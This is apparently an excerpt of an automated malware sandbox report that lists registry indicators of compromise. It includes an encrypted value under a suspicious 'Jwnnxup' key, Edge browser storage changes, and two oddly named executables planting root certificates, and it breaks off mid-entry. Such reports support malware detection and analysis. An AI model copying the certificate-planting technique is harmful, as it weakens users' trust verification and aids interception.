\REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c735230f3e51c97b59ca34f365fcb66f639b16cd0a44740d27820ba320ffa191f9b692cc93f347d3cc52d21ee681b8a77ed284d462c48df4e70a69ca2ad8cd844a39d499c14ec43364bf37a335077cb97ebea1d709902d4da5f421be70e5c8b7cb121062721e2fa055c3c1915b52bd4dc94ed30eba3579b5 explorer.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mx.gearbest.com\ = "238" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000efb2a684f70187d265f1f86a2090dab1676e3fa9989fe328f4a7aedaaaba96cc6cfe82d448c0e3077ad50a9dad8280dc38b65a39e6680c42ea6c133b010c0c86082a0c7560dc4ca2f0a2b4abf6baa4209e2e60079b9e0357f4ea949c3632d13025d71ff6cb743ad158f9d46d78579cc85b78ebbbb26160d1adc1088fbc4d72b68fa58bc716aa2eb28178ffc040796aaa0333e82cbad15728fc91a6c8637e37a1b6340554d09c3c0492c0d4e23e40425d98fea9bc870e3fb94efa689d08e363aee8245a2b0b6c7ea666724116b6cb31be127b53cf8c38f170489c3103a59db6c43616003dec384be8fb2cd78bdd3cb0c2ba48004ad26f06434d174d2cdccc632b2fa8ff223622ecac2190c89214b2849ed307a529e0d3bb731a0b4ba953917c19797b9f7ad7489855ee3cfe434b4d0a3a2657c22091840aae7c18b8220f0aef8e402feb527bcc098b82d18740912c67f390d7ce4dbea202f077de9e9ec7582e8481649ea081cc1cc614f03702c3719ab2fe29acfa974dd43f9ffcd8578e9bd866bcba8ed0236affb3a237dab4fd3bfb5341ec8272f4a528348656fa472186789993b6bb79eda0 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\gearbest.com\Total = "317" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mugrikees.com\Total = "120" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\gearbest.com\NumberOfSubdomai = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 306b7ebd32c7d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.gearbest.com\ = "239" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\Certif MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 25b0743d06c1d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mugrikees.com\ = "120" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mugrikees.com\Total = "785" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mx.gearbest.com\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 077c408333c7d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "626" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.gearbest.com\ = "339" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 28be969231c7d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "754" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "309" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658B = 03000000010000001400000083da05a9886f7658be73acf0a4930c0f99b92f011400000001000000140000003656896549cb5b9b2f3cac4216504d91b933d79104000000010000001000000062455357dd57cb80c32ab295743cccc00f00000001000000200000006811c6215f18c75fdbe32cf56bd66248562a7fa3ba459cfee338745061e583941900000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d705c000000010000000400000000100000180000000100000010000000bb048f1838395f6fc3a1f3d2b7e976542000000001000000dc060000308206d8308204c0a003020102020a613fb718000000000004300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131313031383232353531395a170d3236313031383233303531395a307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f66742053656375726520536572766572204341203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100d00bc0a4a81981e236e5e2aae5f3b2155875beb4e549f1e084f9bb0d64ef85c18155b8f3e7f16d40553dce8b6ad18493f5757c5ba4d47410ca32f323d3aeeecf9e0458c2d947cbd17c004148711b01671718afc6fe73037ee4ef439cef01712a1f81264377985457739d552bf09e8e7d060eac1b54f326f7f82308228b9e061d3738fd72d2cae563c19a5a7db26db352a96ee9aeb5fc8b36f99efaf61c581b9756a511e5b752dbbbe9f054bfb4ff2c6cb85d26cea00ad7df93ed7fddacf12c731ad9193755badd22788ea1d49b09f807223171b094aee0b0e726445790819715ce61ec65e24bf185521632f8b578aa7ecd4dec8321a4a89bbe9a6a04e0a31ccd56186cfd6b2f423ee237f272abd07873727bdeec0058e52130a3083a99ef9fc3f77a169665b5c381aff4397049aff6a9f66a0038f9b40819e01a35a55676225f6af269ae3ead58464db854f68941441e72b1bc122753d2c1ffb2cd50981eb5f4bbb6c28239d9ac1bf23b27846ab0c6260bd73a10e7b3db7cd356ac534c0bfa3b313774d8592bf9007919067bfd1c1d42d4410d2f050ed56b4923ffcfcdf87a82cfda3c2ddfe8d8120418ba1e8877b8981f1007bbc8057e0b09bf6bdde34e5bb0f9c784a63bca4c9f5b6229f7c7a2a89588702ce5c13f3c52234f409ac33185832fbf29f11d508f219607ceeff280c2447d9b62ef2fc37789ab454d533e0279d30203010001a382014b30820147301006092b06010401823715010403020100301d0603551d0e041604143656896549cb5b9b2f3cac4216504d91b933d791301906092b0601040182371402040c1e0a00530075006200430041300b0603551d0f040403020186300f0603551d130101ff040530030101ff301f0603551d23041830168014722d3a02319043b914054ee1eaa7c731d1238934305a0603551d1f04533051304fa04da04b8649687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f63726c2f70726f64756374732f4d6963526f6f436572417574323031315f323031315f30335f32322e63726c305e06082b0601050507010104523050304e06082b060105050730028642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f63657274732f4d6963526f6f436572417574323031315f323031315f30335f32322e637274300d06092a864886f70d01010b0500038202010041c861c1f55b9e3e9131f1b0c6bf0901b49db69074d709dba62e0d9fc8e7763446af0760894c81b33cd5f4123575c273a5f54d848ccba45dafbf92f617085742957265057679adeed1bab82e54a35107ac68eb210ce32581c2cd2af2c3ffcfc2bd49189ac7f084c5f914bc6b95e596efb342d253d54aa012c4ae12765309560e9df7d3a6498850f28a2c9720a2be4e78ef0565b74ba11688de31c70842247ca47b9e9dbc60005e6297e393fca7fe5b7b25dfe4537f4bbee63ef0db0179421c6e856c7db64430fba5379293b2a5ee20ad3f53d5c9f4286b57c1f81d6ab7562ab627811ca62d9fe7f4d0318397a82ab6acbe1b41f5e4895f56fbda5ad35e7d5594107e5357f44a3d402ac8bd679f84e110eefdda6b158249fc461dff4506749c4214edc539d3b3cd0b832790435192f24482ae6e9a1517b219fac7456c98017bbf37a9b088a492bc3838e01de47c97981a2e5fef3865b7352fbd7f4f21fac48cd26f06f94935eadf200f25aaea60ab2c1f4b89fcb7fa5c54904b3ea2284f6ce45265c1fd901c8582886ee9a655dd21287945b014e50acce65fc4bbdb6134699fac2638f7c1294108152e4ca0f7f90c3ede5fab08092d83acac348362f4c949428925b56eb247c5b339a0b1201b2cb18e046fa530491cd046e9405bf4ad6ebadb824a87124a80094ddbdf76b9055b1be0bb20705f0025c7d30efa16ad7b229e7108 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\it.gearbest.com\ = "338" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mugrikees.com\Total = "9" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d385ccd632c7d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\it.gearbest.com\ = "238" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "349" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mugrikees.com\Total = "111" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe -
Processes:
Fri051e1e7444.exeDYbALA.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Fri051e1e7444.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Fri051e1e7444.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD DYbALA.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 